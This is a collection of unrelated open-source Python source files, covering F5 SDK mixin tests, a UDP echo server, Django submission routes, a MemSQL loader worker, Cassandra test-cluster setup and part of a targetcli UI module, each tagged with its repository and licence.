# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import mock
import os
import pytest
import requests
import requests_mock
import struct
from f5.bigip.mixins import AsmFileMixin
from f5.bigip.mixins import CommandExecutionMixin
from f5.bigip.mixins import ToDictMixin
from f5.bigip.resource import Resource
from f5.sdk_exception import EmptyContent
from f5.sdk_exception import MissingHttpHeader
from f5.sdk_exception import UnsupportedMethod
from requests import HTTPError
class MixinTestClass(ToDictMixin):
def __init__(self):
pass
def test_int():
MTCobj = MixinTestClass()
MTCobj.x = 1
mtc_as_dict = MTCobj.to_dict()
assert json.dumps(mtc_as_dict) == '{"x": 1}'
def test_list():
MTCobj = MixinTestClass()
MTCobj.x = [1, 'a']
mtc_as_dict = MTCobj.to_dict()
assert json.dumps(mtc_as_dict) == '{"x": [1, "a"]}'
def test_list_and_int():
MTCobj = MixinTestClass()
MTCobj.x = [1, 'a']
MTCobj.y = 1
mtc_as_dict = MTCobj.to_dict()
assert json.dumps(mtc_as_dict, sort_keys=True) == \
'{"x": [1, "a"], "y": 1}'
def test_list_and_int_and_list2():
MTCobj = MixinTestClass()
MTCobj.x = [1, 'a']
MTCobj.y = 1
MTCobj.z = [1, 'a']
mtc_as_dict = MTCobj.to_dict()
assert json.dumps(mtc_as_dict, sort_keys=True) == \
'{"x": [1, "a"], "y": 1, "z": [1, "a"]}'
def test_two_refs():
MTCobj = MixinTestClass()
MTCobj.x = [1, 'a']
MTCobj.z = MTCobj.x
mtc_as_dict = MTCobj.to_dict()
dict1 = json.dumps(mtc_as_dict, sort_keys=True)
assert dict1 ==\
'{"x": [1, "a"], "z": ["TraversalRecord", "x"]}'
def test_tuple():
MTCobj = MixinTestClass()
MTCobj.x = (1, 'a')
mtc_as_dict = MTCobj.to_dict()
assert json.dumps(mtc_as_dict) == '{"x": [1, "a"]}'
class ToDictMixinAttribute(ToDictMixin):
def __init__(self):
pass
def test_ToDictMixinAttribute():
MTCobj = MixinTestClass()
TDMAttrObj = ToDictMixinAttribute()
MTCobj.x = TDMAttrObj
mtc_as_dict = MTCobj.to_dict()
assert json.dumps(mtc_as_dict) == '{"x": {}}'
def test_ToDictMixinAttribute_Nested():
MTCobj = MixinTestClass()
TDMAttrObj = ToDictMixinAttribute()
TDMAttrObj.y = {'a': 3}
MTCobj.x = TDMAttrObj
mtc_as_dict = MTCobj.to_dict()
assert json.dumps(mtc_as_dict) == '{"x": {"y": {"a": 3}}}'
class DictableClass(object):
def __init__(self):
self.test_attribute = 42
def test_TestClass_Basic():
TDMAttrObj = ToDictMixinAttribute()
TDMAttrObj.y = DictableClass()
mtc_as_dict = TDMAttrObj.to_dict()
assert json.dumps(mtc_as_dict) == '{"y": {"test_attribute": 42}}'
class MockResponse(object):
def __init__(self, attr_dict):
self.__dict__ = attr_dict
def json(self):
return self.__dict__
class FakeCommandResource(CommandExecutionMixin, Resource):
def __init__(self, container):
super(FakeCommandResource, self).__init__(container)
self._meta_data['allowed_commands'] = ['fakecommand', 'fakecommand2']
self._meta_data['required_json_kind'] = 'tm:ltm:fakeendpoint:fakeres'
self._meta_data['allowed_lazy_attributes'] = []
mockuri = 'https://localhost/mgmt/tm/ltm/fakeendpoint/fakeres'
self._meta_data['uri'] = mockuri
self._meta_data['bigip']._meta_data[
'icr_session'].post.return_value =\
MockResponse({"generation": 0, "selfLink": mockuri,
"kind": "tm:ltm:fakeendpoint:fakeres"})
class TestCommandExecutionMixin(object):
def test_create_raises(self):
command_resource = CommandExecutionMixin()
with pytest.raises(UnsupportedMethod):
command_resource.create()
def test_delete_raises(self):
command_resource = CommandExecutionMixin()
with pytest.raises(UnsupportedMethod):
command_resource.delete()
def test_load_raises(self):
command_resource = CommandExecutionMixin()
with pytest.raises(UnsupportedMethod):
command_resource.load()
def test_exec_cmd_instance(self):
fake_res = FakeCommandResource(mock.MagicMock())
cmd1 = fake_res.exec_cmd('fakecommand')
cmd2 = fake_res.exec_cmd('fakecommand2')
assert cmd1 is not cmd2
def fake_http_server(uri, **kwargs):
session = requests.Session()
adapter = requests_mock.Adapter()
session.mount('mock', adapter)
adapter.register_uri('GET', uri, **kwargs)
return session
class FakeAsmFileMixin(AsmFileMixin):
def __init__(self, uri, **kwargs):
session = fake_http_server(uri, **kwargs)
self._meta_data = {'icr_session': session}
self.file_bound_uri = uri
class TestAsmFileMixin(object):
def test_download(self):
# Prepare baseline file
f = open('fakefile.txt', 'wb')
f.write(struct.pack('B', 0))
basefilesize = int(os.stat('fakefile.txt').st_size)
f.close()
# Start Testing
server_fakefile = 'asasasas' * 40
srvfakesize = len(server_fakefile)
header = {'Content-Length': str(srvfakesize),
'Content-Type': 'application/text'}
dwnld = FakeAsmFileMixin('mock://test.com/fakefile.txt',
text=server_fakefile, headers=header,
status_code=200)
dwnld._download_file('fakefile.txt')
endfilesize = int(os.stat('fakefile.txt').st_size)
assert basefilesize != srvfakesize
assert endfilesize == srvfakesize
assert endfilesize == 320
def test_404_response(self):
# Cleanup
os.remove('fakefile.txt')
# Test Start
header = {'Content-Type': 'application/text'}
dwnld = FakeAsmFileMixin(
'mock://test.com/fakefile.txt', headers=header,
status_code=404, reason='Not Found')
try:
dwnld._download_file('fakefile.txt')
except HTTPError as err:
assert err.response.status_code == 404
def test_zero_content_length_header(self):
# Test Start
header = {'Content-Type': 'application/text',
'Content-Length': '0'}
dwnld = FakeAsmFileMixin(
'mock://test.com/fake_file.txt', headers=header,
status_code=200)
with pytest.raises(EmptyContent) as err:
dwnld._download_file('fakefile.txt')
msg = "Invalid Content-Length value returned: %s ,the value " \
"should be greater than 0"
assert err.value.message == msg
def test_no_content_length_header(self):
# Test Start
header = {'Content-Type': 'application/text'}
dwnld = FakeAsmFileMixin(
'mock://test.com/fakefile.txt', headers=header,
status_code=200)
with pytest.raises(MissingHttpHeader) as err:
dwnld._download_file('fakefile.txt')
msg = "The Content-Length header is not present."
assert err.value.message == msg
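# A hedged sketch (not f5's actual implementation) of the behavior the
# test_two_refs case implies: track already-visited containers and replace a
# second reference with a ['TraversalRecord', name] marker instead of
# serializing it again.
def sketch_to_dict(obj):
    seen = {}
    def convert(value, name):
        if id(value) in seen:
            return ['TraversalRecord', seen[id(value)]]
        if isinstance(value, (list, tuple)):
            seen[id(value)] = name
            return [convert(item, name) for item in value]
        if hasattr(value, '__dict__'):
            seen[id(value)] = name
            return dict((k, convert(v, k)) for k, v in vars(value).items())
        return value
    return dict((k, convert(v, k)) for k, v in vars(obj).items())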
| F5Networks/f5-common-python | f5/bigip/test/unit/test_mixins.py | Python | apache-2.0 | 7,579 |
# Python 2/3 compatibility: SocketServer was renamed to socketserver in Python 3
try:
import SocketServer as socketserver
except ImportError:
import socketserver
import logging
import sys
import threading
class EchoUDPHandler(socketserver.BaseRequestHandler):
def handle(self):
data = self.request[0].strip()
socket = self.request[1]
logging.info("%s wrote:" % (str(self.client_address[0]),))
logging.info(data)
socket.sendto(data.upper(), self.client_address)
class ServeThread(threading.Thread):
def run(self):
HOST, PORT = 'localhost', 5556
server = socketserver.UDPServer((HOST, PORT), EchoUDPHandler)
server.serve_forever()
def serve():
st = ServeThread()
st.start()
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
serve()
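# A hedged companion client (not part of the original file) to exercise the
# echo server above, which binds localhost:5556 and replies with the
# upper-cased payload.
import socket
def echo_client(message=b'hello', addr=('localhost', 5556), timeout=2.0):
    """Send one datagram to the echo server and return its reply."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.settimeout(timeout)
    s.sendto(message, addr)
    data, _ = s.recvfrom(1024)
    s.close()
    return data  # expected: the upper-cased message, e.g. b'HELLO'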
| rc500/ardrone_archive_aarons_laptop | ardrone/udpechoserver.py | Python | apache-2.0 | 746 |
"""
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from django.conf.urls import url
from django.views.decorators.cache import never_cache
from submissions.views import (SubmissionsOptions, SubmissionListAPIView, SubmissionConstructionAPIView,
SubmissionAlterationAPIView, SubmissionDecommissionAPIView,
SubmissionGetAPIView, SubmissionStaffEditAPIView,
PreSignedDocumentKey,)
from gwells.urls import api_path_prefix
urlpatterns = [
# Submissions form options
url(api_path_prefix() + r'/submissions/options$',
never_cache(SubmissionsOptions.as_view()), name='submissions-options'),
# Submissions list
url(api_path_prefix() + r'/submissions$',
never_cache(SubmissionListAPIView.as_view()), name='submissions-list'),
# Submission
url(api_path_prefix() + r'/submissions/(?P<filing_number>[0-9]+)$',
never_cache(SubmissionGetAPIView.as_view()), name='submissions-get'),
# Construction submission
url(api_path_prefix() + r'/submissions/construction$',
never_cache(SubmissionConstructionAPIView.as_view()), name='CON'),
# Alteration submission
url(api_path_prefix() + r'/submissions/alteration$',
never_cache(SubmissionAlterationAPIView.as_view()), name='ALT'),
# Decommission submission
url(api_path_prefix() + r'/submissions/decommission$',
never_cache(SubmissionDecommissionAPIView.as_view()), name='DEC'),
# Edit submission
url(api_path_prefix() + r'/submissions/staff_edit$',
        # NB: as_view() is a class-only method in Django, so it must be called
        # on the class itself, not on an instance.
        never_cache(SubmissionStaffEditAPIView.as_view()), name='STAFF_EDIT'),
# Document Uploading (submission records)
url(api_path_prefix() + r'/submissions/(?P<submission_id>[0-9]+)/presigned_put_url$',
never_cache(PreSignedDocumentKey.as_view()), name='submissions-pre-signed-url'),
]
| bcgov/gwells | app/backend/submissions/urls.py | Python | apache-2.0 | 2,402 |
import multiprocessing
import threading
import uuid
import random
import time
import os
import signal
import traceback
from memsql_loader.api import shared
from memsql_loader.db import connection_wrapper, pool
from memsql_loader.loader_db.tasks import Tasks
from memsql_loader.loader_db.jobs import Jobs
from memsql_loader.execution.errors import WorkerException, ConnectionException, RequeueTask
from memsql_loader.execution.loader import Loader
from memsql_loader.execution.downloader import Downloader
from memsql_loader.util import db_utils, log
from memsql_loader.util.fifo import FIFO
from memsql_loader.util.apsw_sql_step_queue.errors import APSWSQLStepQueueException, TaskDoesNotExist
HUNG_DOWNLOADER_TIMEOUT = 3600
class ExitingException(Exception):
pass
class Worker(multiprocessing.Process):
def __init__(self, worker_sleep, parent_pid, worker_lock):
self.worker_id = uuid.uuid1().hex[:8]
self.worker_sleep = worker_sleep
self.worker_lock = worker_lock
self.worker_working = multiprocessing.Value('i', 1)
self.parent_pid = parent_pid
self._exit_evt = multiprocessing.Event()
self.logger = log.get_logger('worker[%s]' % self.worker_id)
super(Worker, self).__init__(name=('worker-%s' % self.worker_id))
def kill_query_if_exists(self, conn_args, conn_id):
with pool.get_connection(database='information_schema', **conn_args) as conn:
id_row = conn.query("SELECT id FROM processlist WHERE info LIKE '%%LOAD DATA%%' AND id=%s", conn_id)
if len(id_row) > 0:
# Since this is a LOAD DATA LOCAL query, we need to kill the
# connection, not the query, since LOAD DATA LOCAL queries
# don't end until the file is fully read, even if they're
# killed.
db_utils.try_kill_connection(conn, conn_id)
def kill_delete_query_if_exists(self, conn_args, conn_id):
with pool.get_connection(database='information_schema', **conn_args) as conn:
id_row = conn.query("SELECT id FROM processlist WHERE info LIKE '%%DELETE%%' AND id=%s", conn_id)
if len(id_row) > 0:
db_utils.try_kill_query(conn, conn_id)
def signal_exit(self):
self._exit_evt.set()
def is_working(self):
return self.worker_working.value == 1
def run(self):
self.jobs = Jobs()
self.tasks = Tasks()
task = None
ignore = lambda *args, **kwargs: None
signal.signal(signal.SIGINT, ignore)
signal.signal(signal.SIGQUIT, ignore)
try:
while not self.exiting():
time.sleep(random.random() * 0.5)
task = self.tasks.start()
if task is None:
self.worker_working.value = 0
else:
self.worker_working.value = 1
job_id = task.job_id
job = self.jobs.get(job_id)
old_conn_id = task.data.get('conn_id', None)
if old_conn_id is not None:
self.kill_query_if_exists(job.spec.connection, old_conn_id)
self.logger.info('Task %d: starting' % task.task_id)
try:
# can't use a pooled connection due to transactions staying open in the
# pool on failure
with pool.get_connection(database=job.spec.target.database, pooled=False, **job.spec.connection) as db_connection:
db_connection.execute("BEGIN")
self._process_task(task, db_connection)
self.logger.info('Task %d: finished with success', task.task_id)
except (RequeueTask, ConnectionException):
self.logger.info('Task %d: download failed, requeueing', task.task_id)
self.logger.debug("Traceback: %s" % (traceback.format_exc()))
task.requeue()
except TaskDoesNotExist as e:
self.logger.info('Task %d: finished with error, the task was either cancelled or deleted', task.task_id)
self.logger.debug("Traceback: %s" % (traceback.format_exc()))
except WorkerException as e:
task.error(str(e))
self.logger.info('Task %d: finished with error', task.task_id)
except Exception as e:
self.logger.debug("Traceback: %s" % (traceback.format_exc()))
raise
raise ExitingException()
except ExitingException:
self.logger.debug('Worker exiting')
if task is not None and not task.valid():
try:
task.requeue()
except APSWSQLStepQueueException:
pass
def _process_task(self, task, db_connection):
job_id = task.job_id
job = self.jobs.get(job_id)
if job is None:
raise WorkerException('Failed to find job with ID %s' % job_id)
# If this is a gzip file, we add .gz to the named pipe's name so that
# MemSQL knows to decompress it unless we're piping this into a script,
# in which case we do the decompression here in-process.
if job.spec.options.script is not None:
gzip = False
else:
gzip = task.data['key_name'].endswith('.gz')
fifo = FIFO(gzip=gzip)
# reduces the chance of synchronization between workers by
# initially sleeping in the order they were started and then
# randomly sleeping after that point
time.sleep(self.worker_sleep)
self.worker_sleep = 0.5 * random.random()
if self.exiting() or not task.valid():
raise ExitingException()
if job.has_file_id():
if self._should_delete(job, task):
self.logger.info('Waiting for DELETE lock before cleaning up rows from an earlier load')
try:
while not self.worker_lock.acquire(block=True, timeout=0.5):
if self.exiting() or not task.valid():
raise ExitingException()
task.ping()
self.logger.info('Attempting cleanup of rows from an earlier load')
num_deleted = self._delete_existing_rows(db_connection, job, task)
self.logger.info('Deleted %s rows during cleanup' % num_deleted)
finally:
try:
self.worker_lock.release()
except ValueError:
# This is raised if we didn't acquire the lock (e.g. if
# there was a KeyboardInterrupt before we acquired the
# lock above. In this case, we don't need to
# release the lock.
pass
if self.exiting() or not task.valid():
raise ExitingException()
downloader = Downloader()
downloader.load(job, task, fifo)
loader = Loader()
loader.load(job, task, fifo, db_connection)
loader.start()
downloader.start()
try:
while not self.exiting():
time.sleep(0.5)
with task.protect():
self._update_task(task, downloader)
task.save()
if downloader.is_alive() and time.time() > downloader.metrics.last_change + HUNG_DOWNLOADER_TIMEOUT:
# downloader has frozen, and the progress handler froze as well
self.logger.error("Detected hung downloader. Trying to exit.")
self.signal_exit()
loader_alive = loader.is_alive()
downloader_alive = downloader.is_alive()
if not loader_alive or not downloader_alive:
if loader.error or downloader.error:
# We want to make sure that in the case of simultaneous
# exceptions, we see both before deciding what to do
time.sleep(3)
# Only exit if at least 1 error or both are not alive
elif not loader_alive and not downloader_alive:
break
else:
continue
loader_error = loader.error
loader_tb = loader.traceback
downloader_error = downloader.error
downloader_tb = downloader.traceback
any_requeue_task = isinstance(loader_error, RequeueTask) or isinstance(downloader_error, RequeueTask)
loader_worker_exception = isinstance(loader_error, WorkerException)
downloader_worker_exception = isinstance(downloader_error, WorkerException)
# If we have any RequeueTasks, then requeue
if any_requeue_task:
raise RequeueTask()
# Raise the earlier exception
elif loader_worker_exception and downloader_worker_exception:
if loader_error.time < downloader_error.time:
raise loader_error, None, loader_tb
else:
raise downloader_error, None, downloader_tb
# If they're both exceptions but one of them isn't a WorkerException
elif (downloader_error and loader_error) and (loader_worker_exception or downloader_worker_exception):
if not loader_worker_exception:
raise loader_error, None, loader_tb
else:
raise downloader_error, None, downloader_tb
# We don't have any WorkerExceptions, raise a random one
# Also handles the case where only one exception is raised
elif downloader_error or loader_error:
raise downloader_error or loader_error, None, downloader_tb or loader_tb
else:
assert False, 'Program should only reach this conditional block if at least one error exists'
finally:
if downloader.is_alive():
downloader.terminate()
self.logger.info('Waiting for threads to exit...')
while downloader.is_alive() or loader.is_alive():
loader.join(5)
downloader.join(5)
if task.valid():
task.ping()
if self.exiting():
raise ExitingException()
with task.protect():
db_connection.execute("COMMIT")
self._update_task(task, downloader)
task.finish('success')
def _should_delete(self, job, task):
competing_job_ids = ["'%s'" % j.id for j in self.jobs.query_target(job.spec.connection.host, job.spec.connection.port, job.spec.target.database, job.spec.target.table)]
predicate_sql = "file_id = :file_id and job_id in (%s)" % ','.join(competing_job_ids)
matching = self.tasks.get_tasks_in_state(
[ shared.TaskState.SUCCESS ],
extra_predicate=(predicate_sql, { 'file_id': task.file_id }))
return len(matching) > 0
def _delete_existing_rows(self, conn, job, task):
file_id = task.file_id
sql = {
'database_name': job.spec.target.database,
'table_name': job.spec.target.table,
'file_id_column': job.spec.options.file_id_column
}
thread_ctx = {
'num_deleted': 0,
'exception': None
}
def _run_delete_query():
try:
thread_ctx['num_deleted'] = conn.query('''
DELETE FROM `%(database_name)s`.`%(table_name)s`
WHERE `%(file_id_column)s` = %%s
''' % sql, file_id)
except connection_wrapper.ConnectionWrapperException as e:
self.logger.error(
'Connection error when cleaning up rows: %s', str(e))
thread_ctx['exception'] = RequeueTask()
except pool.MySQLError as e:
errno, msg = e.args
msg = 'Error when cleaning up rows (%d): %s' % (errno, msg)
self.logger.error(msg)
thread_ctx['exception'] = RequeueTask()
except Exception as e:
thread_ctx['exception'] = e
t = threading.Thread(target=_run_delete_query)
t.start()
while not self.exiting() and task.valid():
try:
# Ping the task to let the SQL queue know that it's still active.
task.ping()
except TaskDoesNotExist:
# The task might have gotten cancelled between when we checked
# whether it's valid and when we ping() it. If ping() fails and
# it has been cancelled in between, then we should proceed with
# killing the delete query if it exists
continue
if not t.is_alive():
break
time.sleep(0.5)
else:
# delete thread didn't finish on its own
self.kill_delete_query_if_exists(job.spec.connection, conn.thread_id())
t.join()
exc = thread_ctx['exception']
if exc is not None:
raise exc
return thread_ctx['num_deleted']
def _update_task(self, task, downloader):
stats = downloader.metrics.get_stats()
task.bytes_downloaded = stats['bytes_downloaded']
task.download_rate = stats['download_rate']
task.data['time_left'] = stats['time_left']
def exiting(self):
try:
os.kill(self.parent_pid, 0)
except OSError:
# parent process does not exist, exit immediately
return True
return self._exit_evt.is_set()
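# A hedged, self-contained sketch (separate from the real FIFO class used
# above, which also handles gzip) of the pattern this worker wires together:
# a downloader thread writes into a named pipe while the loader reads it back
# out, so both stages stream concurrently without buffering the whole file.
# POSIX-only, since it relies on os.mkfifo; reuses the os/threading imports
# at the top of this file.
import tempfile
def _fifo_demo():
    path = os.path.join(tempfile.mkdtemp(), 'demo.fifo')
    os.mkfifo(path)
    def _producer():  # stands in for Downloader
        with open(path, 'wb') as writer:
            writer.write(b'row1\nrow2\n')
    t = threading.Thread(target=_producer)
    t.start()
    with open(path, 'rb') as reader:  # stands in for Loader feeding LOAD DATA
        data = reader.read()
    t.join()
    os.remove(path)
    return data  # b'row1\nrow2\n'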
| memsql/memsql-loader | memsql_loader/execution/worker.py | Python | apache-2.0 | 14,261 |
# Copyright 2013-2015 DataStax, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
import traceback
try:
import unittest2 as unittest
except ImportError:
import unittest # noqa
import logging
log = logging.getLogger(__name__)
import os
from threading import Event
import six
from subprocess import call
from itertools import groupby
from cassandra.cluster import Cluster
try:
from ccmlib.cluster import Cluster as CCMCluster
from ccmlib.cluster_factory import ClusterFactory as CCMClusterFactory
from ccmlib import common
except ImportError as e:
CCMClusterFactory = None
CLUSTER_NAME = 'test_cluster'
SINGLE_NODE_CLUSTER_NAME = 'single_node'
MULTIDC_CLUSTER_NAME = 'multidc_test_cluster'
CCM_CLUSTER = None
path = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'ccm')
if not os.path.exists(path):
os.mkdir(path)
cass_version = None
cql_version = None
def get_server_versions():
"""
Probe system.local table to determine Cassandra and CQL version.
Returns a tuple of (cassandra_version, cql_version).
"""
global cass_version, cql_version
if cass_version is not None:
return (cass_version, cql_version)
c = Cluster(protocol_version=1)
s = c.connect()
row = s.execute('SELECT cql_version, release_version FROM system.local')[0]
cass_version = _tuple_version(row.release_version)
cql_version = _tuple_version(row.cql_version)
c.shutdown()
return (cass_version, cql_version)
def _tuple_version(version_string):
if '-' in version_string:
version_string = version_string[:version_string.index('-')]
return tuple([int(p) for p in version_string.split('.')])
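# For example, _tuple_version('2.1.3') -> (2, 1, 3); a '-SNAPSHOT'-style
# suffix is stripped first, so _tuple_version('2.1.3-SNAPSHOT') yields the
# same tuple.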
USE_CASS_EXTERNAL = bool(os.getenv('USE_CASS_EXTERNAL', False))
default_cassandra_version = '2.1.3'
if USE_CASS_EXTERNAL:
if CCMClusterFactory:
# see if the external instance is running in ccm
path = common.get_default_path()
name = common.current_cluster_name(path)
CCM_CLUSTER = CCMClusterFactory.load(common.get_default_path(), name)
CCM_CLUSTER.start(wait_for_binary_proto=True, wait_other_notice=True)
# Not sure what's going on, but the server version query
# hangs in python3. This appears to be related to running inside of
# nosetests, and only for this query that would run while loading the
# module.
# This is a hack to make it run with default cassandra version for PY3.
# Not happy with it, but need to move on for now.
if not six.PY3:
cass_ver, _ = get_server_versions()
default_cassandra_version = '.'.join('%d' % i for i in cass_ver)
else:
if not os.getenv('CASSANDRA_VERSION'):
log.warning("Using default C* version %s because external server cannot be queried" % default_cassandra_version)
CASSANDRA_DIR = os.getenv('CASSANDRA_DIR', None)
CASSANDRA_VERSION = os.getenv('CASSANDRA_VERSION', default_cassandra_version)
CCM_KWARGS = {}
if CASSANDRA_DIR:
log.info("Using Cassandra dir: %s", CASSANDRA_DIR)
CCM_KWARGS['install_dir'] = CASSANDRA_DIR
else:
log.info('Using Cassandra version: %s', CASSANDRA_VERSION)
CCM_KWARGS['version'] = CASSANDRA_VERSION
if CASSANDRA_VERSION > '2.1':
default_protocol_version = 3
elif CASSANDRA_VERSION > '2.0':
default_protocol_version = 2
else:
default_protocol_version = 1
PROTOCOL_VERSION = int(os.getenv('PROTOCOL_VERSION', default_protocol_version))
def get_cluster():
return CCM_CLUSTER
def get_node(node_id):
return CCM_CLUSTER.nodes['node%s' % node_id]
def use_multidc(dc_list):
use_cluster(MULTIDC_CLUSTER_NAME, dc_list, start=True)
def use_singledc(start=True):
use_cluster(CLUSTER_NAME, [3], start=start)
def use_single_node(start=True):
use_cluster(SINGLE_NODE_CLUSTER_NAME, [1], start=start)
def remove_cluster():
if USE_CASS_EXTERNAL:
return
global CCM_CLUSTER
if CCM_CLUSTER:
log.debug("removing cluster %s", CCM_CLUSTER.name)
CCM_CLUSTER.remove()
CCM_CLUSTER = None
def is_current_cluster(cluster_name, node_counts):
global CCM_CLUSTER
if CCM_CLUSTER and CCM_CLUSTER.name == cluster_name:
if [len(list(nodes)) for dc, nodes in
groupby(CCM_CLUSTER.nodelist(), lambda n: n.data_center)] == node_counts:
return True
return False
def use_cluster(cluster_name, nodes, ipformat=None, start=True):
global CCM_CLUSTER
if USE_CASS_EXTERNAL:
if CCM_CLUSTER:
log.debug("Using external ccm cluster %s", CCM_CLUSTER.name)
else:
log.debug("Using unnamed external cluster")
return
if is_current_cluster(cluster_name, nodes):
log.debug("Using existing cluster %s", cluster_name)
return
if CCM_CLUSTER:
log.debug("Stopping cluster %s", CCM_CLUSTER.name)
CCM_CLUSTER.stop()
try:
try:
cluster = CCMClusterFactory.load(path, cluster_name)
log.debug("Found existing ccm %s cluster; clearing", cluster_name)
cluster.clear()
cluster.set_install_dir(**CCM_KWARGS)
except Exception:
log.debug("Creating new ccm %s cluster with %s", cluster_name, CCM_KWARGS)
cluster = CCMCluster(path, cluster_name, **CCM_KWARGS)
cluster.set_configuration_options({'start_native_transport': True})
common.switch_cluster(path, cluster_name)
cluster.populate(nodes, ipformat=ipformat)
if start:
log.debug("Starting ccm %s cluster", cluster_name)
cluster.start(wait_for_binary_proto=True, wait_other_notice=True)
setup_test_keyspace(ipformat=ipformat)
CCM_CLUSTER = cluster
except Exception:
log.exception("Failed to start ccm cluster. Removing cluster.")
remove_cluster()
call(["pkill", "-9", "-f", ".ccm"])
raise
def teardown_package():
if USE_CASS_EXTERNAL:
return
# when multiple modules are run explicitly, this runs between them
# need to make sure CCM_CLUSTER is properly cleared for that case
remove_cluster()
for cluster_name in [CLUSTER_NAME, MULTIDC_CLUSTER_NAME]:
try:
cluster = CCMClusterFactory.load(path, cluster_name)
try:
cluster.remove()
log.info('Removed cluster: %s' % cluster_name)
except Exception:
log.exception('Failed to remove cluster: %s' % cluster_name)
except Exception:
log.warn('Did not find cluster: %s' % cluster_name)
def setup_test_keyspace(ipformat=None):
# wait for nodes to startup
time.sleep(10)
if not ipformat:
cluster = Cluster(protocol_version=PROTOCOL_VERSION)
else:
cluster = Cluster(contact_points=["::1"], protocol_version=PROTOCOL_VERSION)
session = cluster.connect()
try:
results = session.execute("SELECT keyspace_name FROM system.schema_keyspaces")
existing_keyspaces = [row[0] for row in results]
for ksname in ('test1rf', 'test2rf', 'test3rf'):
if ksname in existing_keyspaces:
session.execute("DROP KEYSPACE %s" % ksname)
ddl = '''
CREATE KEYSPACE test3rf
WITH replication = {'class': 'SimpleStrategy', 'replication_factor': '3'}'''
session.execute(ddl)
ddl = '''
CREATE KEYSPACE test2rf
WITH replication = {'class': 'SimpleStrategy', 'replication_factor': '2'}'''
session.execute(ddl)
ddl = '''
CREATE KEYSPACE test1rf
WITH replication = {'class': 'SimpleStrategy', 'replication_factor': '1'}'''
session.execute(ddl)
ddl = '''
CREATE TABLE test3rf.test (
k int PRIMARY KEY,
v int )'''
session.execute(ddl)
except Exception:
traceback.print_exc()
raise
finally:
cluster.shutdown()
class UpDownWaiter(object):
def __init__(self, host):
self.down_event = Event()
self.up_event = Event()
host.monitor.register(self)
def on_up(self, host):
self.up_event.set()
def on_down(self, host):
self.down_event.set()
def wait_for_down(self):
self.down_event.wait()
def wait_for_up(self):
self.up_event.wait()
| sontek/python-driver | tests/integration/__init__.py | Python | apache-2.0 | 8,900 |
'''
Implements the targetcli target related UI.
This file is part of targetcli.
Copyright (c) 2011-2013 by Datera, Inc
Licensed under the Apache License, Version 2.0 (the "License"); you may
not use this file except in compliance with the License. You may obtain
a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
License for the specific language governing permissions and limitations
under the License.
'''
try:
import ethtool
except ImportError:
ethtool = None
import os
import six
import stat
from configshell_fb import ExecutionError
from rtslib_fb import RTSLibBrokenLink, RTSLibError
from rtslib_fb import MappedLUN, NetworkPortal, NodeACL
from rtslib_fb import LUN, Target, TPG, StorageObjectFactory
from .ui_backstore import complete_path
from .ui_node import UINode, UIRTSLibNode
auth_params = ('userid', 'password', 'mutual_userid', 'mutual_password')
discovery_params = auth_params + ("enable",)
class UIFabricModule(UIRTSLibNode):
'''
A fabric module UI.
'''
def __init__(self, fabric_module, parent):
super(UIFabricModule, self).__init__(fabric_module.name,
fabric_module, parent,
late_params=True)
self.refresh()
if self.rtsnode.has_feature('discovery_auth'):
for param in discovery_params:
self.define_config_group_param('discovery_auth',
param, 'string')
self.refresh()
# Support late params
#
# By default the base class will call list_parameters and list_attributes
# in init. This stops us from being able to lazy-load fabric modules.
# We declare we support "late_params" to stop this, and then
# this code overrides the base class methods that involve enumerating
# this stuff, so we don't need to call list_parameters/attrs (which
# would cause the module to load) until the ui is actually asking for
# them from us.
    # Currently fabric modules don't have these anyway; this is all a CYA thing.
def list_config_groups(self):
groups = super(UIFabricModule, self).list_config_groups()
if len(self.rtsnode.list_parameters()):
groups.append('parameter')
if len(self.rtsnode.list_attributes()):
groups.append('attribute')
return groups
# Support late params (see above)
def list_group_params(self, group, writable=None):
if group not in ("parameter", "attribute"):
return super(UIFabricModule, self).list_group_params(group,
writable)
params_func = getattr(self.rtsnode, "list_%ss" % group)
params = params_func()
params_ro = params_func(writable=False)
ret_list = []
for param in params:
p_writable = param not in params_ro
if writable is not None and p_writable != writable:
continue
ret_list.append(param)
ret_list.sort()
return ret_list
# Support late params (see above)
def get_group_param(self, group, param):
if group not in ("parameter", "attribute"):
return super(UIFabricModule, self).get_group_param(group, param)
if param not in self.list_group_params(group):
raise ValueError("Not such parameter %s in configuration group %s"
% (param, group))
description = "The %s %s." % (param, group)
writable = param in self.list_group_params(group, writable=True)
return dict(name=param, group=group, type="string",
description=description, writable=writable)
def ui_getgroup_discovery_auth(self, auth_attr):
'''
This is the backend method for getting discovery_auth attributes.
@param auth_attr: The auth attribute to get the value of.
@type auth_attr: str
@return: The auth attribute's value
@rtype: str
'''
if auth_attr == 'enable':
return self.rtsnode.discovery_enable_auth
else:
return getattr(self.rtsnode, "discovery_" + auth_attr)
def ui_setgroup_discovery_auth(self, auth_attr, value):
'''
This is the backend method for setting discovery auth attributes.
@param auth_attr: The auth attribute to set the value of.
@type auth_attr: str
@param value: The auth's value
@type value: str
'''
self.assert_root()
if value is None:
value = ''
if auth_attr == 'enable':
self.rtsnode.discovery_enable_auth = value
else:
setattr(self.rtsnode, "discovery_" + auth_attr, value)
def refresh(self):
self._children = set([])
for target in self.rtsnode.targets:
self.shell.log.debug("Found target %s under fabric module %s."
% (target.wwn, target.fabric_module))
if target.has_feature('tpgts'):
UIMultiTPGTarget(target, self)
else:
UITarget(target, self)
def summary(self):
status = None
